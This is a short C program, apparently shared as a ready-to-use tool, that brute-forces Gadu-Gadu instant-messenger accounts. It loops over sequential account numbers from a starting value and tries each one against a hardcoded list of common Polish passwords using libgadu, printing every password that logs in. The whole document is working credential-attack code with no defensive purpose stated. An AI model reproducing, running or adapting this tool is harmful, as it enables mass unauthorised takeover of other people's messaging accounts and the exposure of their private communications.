A small C program that can brute force gadu-gadu accounts starting from a given number and using a hardcoded list of passwords.
048dcc6171b1c08f6132e372e9ac410d6b68d1e47402d1a2901c9bb8bf5528e7
// gg_bf.c gadu mass brute force
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <libgadu.h>
#include <signal.h>
void die();
int numb;
void die() {
printf("\n: stoped at %d\n", numb);
exit(1);
}
int main(int argc, char **argv) {
char *pwds[] = { "12345", "123", "michal", "pawel", "tomek", "marta", "sedes",
"marcin", "qwerty", "abc", "abc123", "<lol>", "lol", "artur", "kasia",
"misiaczek", "asia", "haslo", "ziom","myszka", "tomek", "chaslo", "ola",
"asdf", NULL };
struct gg_session *sess;
struct gg_login_params p;
int i, start_numb, cracked;
if (!argv[1]) {
printf("usage: %s <start_uin>\n", argv[0]);
return 0;
}
start_numb = atoi(argv[1]);
signal(SIGINT, die);
for (i=0;pwds[i];i++);
printf(": %d passwords loaded\n", i);
for (numb=start_numb;numb < 9999999;numb++) {
printf("+ %d : ", numb);
fflush(stdout);
cracked = 0;
for (i=0;pwds[i];i++) {
gg_debug_level = 0;
memset(&p, 0, sizeof(p));
p.uin = numb;
p.password = pwds[i];
if (sess = gg_login(&p)) {
printf("%s\n", p.password);
gg_logoff(sess);
gg_free_session(sess);
cracked++;
break;
}
gg_free_session(sess);
}
if (!cracked)
printf("uncrackable\n");
}
return 0;
}